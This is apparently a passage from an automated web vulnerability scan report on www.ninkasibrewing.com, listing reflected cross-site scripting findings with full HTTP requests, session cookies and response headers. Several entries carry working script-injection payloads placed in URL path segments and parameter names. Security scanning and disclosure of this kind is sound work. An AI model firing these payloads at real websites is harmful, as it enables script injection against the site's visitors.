The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f15af"><a>10c219e5d62 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /companyf15af"><a>10c219e5d62/content/js/combined.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:49:27 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95cc6"><a>4a3776524c8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /company95cc6"><a>4a3776524c8/content/js/combined.js HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:50:11 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3673a"><a>3f6d411eb9a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /contact3673a"><a>3f6d411eb9a/ HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.ninkasibrewing.com/ Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:44:35 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
1.183. http://www.ninkasibrewing.com/contact/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ninkasibrewing.com
Path:
/contact/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a1f4"><script>alert(1)</script>795f4542f78 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contact/?4a1f4"><script>alert(1)</script>795f4542f78=1 HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.ninkasibrewing.com/ Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:44:35 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 14646
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d20c6"><a>9742955dd12 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /contactd20c6"><a>9742955dd12/content/css/basic.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:50:05 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 13214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efd65"><script>alert(1)</script>ad60b82afba was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contact/contentefd65"><script>alert(1)</script>ad60b82afba/css/basic.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:50:39 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 14664
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42b42"><script>alert(1)</script>5fe47e91d14 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contact/content/css42b42"><script>alert(1)</script>5fe47e91d14/basic.css HTTP/1.1 Host: www.ninkasibrewing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;
Response
HTTP/1.1 200 OK Date: Sun, 21 Nov 2010 21:50:54 GMT Server: Apache X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Vary: Accept-Encoding Content-Type: text/html Content-Length: 14664
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>